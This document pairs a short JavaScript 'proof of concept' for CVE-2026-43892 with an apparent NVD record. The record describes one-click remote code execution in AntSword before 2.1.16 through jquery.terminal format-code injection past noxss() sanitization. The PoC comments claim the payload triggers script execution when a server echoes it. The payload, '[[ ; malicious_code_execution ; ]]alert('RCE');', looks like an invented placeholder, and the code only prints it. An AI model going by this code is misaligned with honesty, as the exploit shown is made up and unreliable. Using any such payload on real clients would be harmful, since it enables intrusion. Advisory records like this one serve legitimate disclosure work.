CVE-2026-43892

// PoC Concept for CVE-2026-43892 // This demonstrates the payload structure that exploits the jquery.terminal format injection. // The vulnerability lies in the 'noxss()' function failing to sanitize format codes. // jquery.terminal allows formatting like [[class;style;]text]. // By injecting a specific format, we can achieve RCE. // Malicious payload to be sent to the server (e.g., via webshell response) let payload = "[[;red;]Normal Text]][[ ; malicious_code_execution ; ]]alert('RCE');"; // In a real scenario, this payload would be echoed by the server. // When AntSword < 2.1.16 renders this, the malformed format code triggers JS execution. console.log("Payload generated: " + payload);

{"cve": {"id": "CVE-2026-43892", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:28.640", "lastModified": "2026-05-13T18:24:31.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AntSword is a cross-platform website management toolkit. Prior to 2.1.16, incomplete noxss() sanitization leads to 1-click RCE via jquery.terminal format code injection. This vulnerability is fixed in 2.1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1188"}]}], "references": [{"url": "https://github.com/AntSwordProject/antSword/security/advisories/GHSA-c63g-p4cp-r45x", "source": "[email protected]"}]}}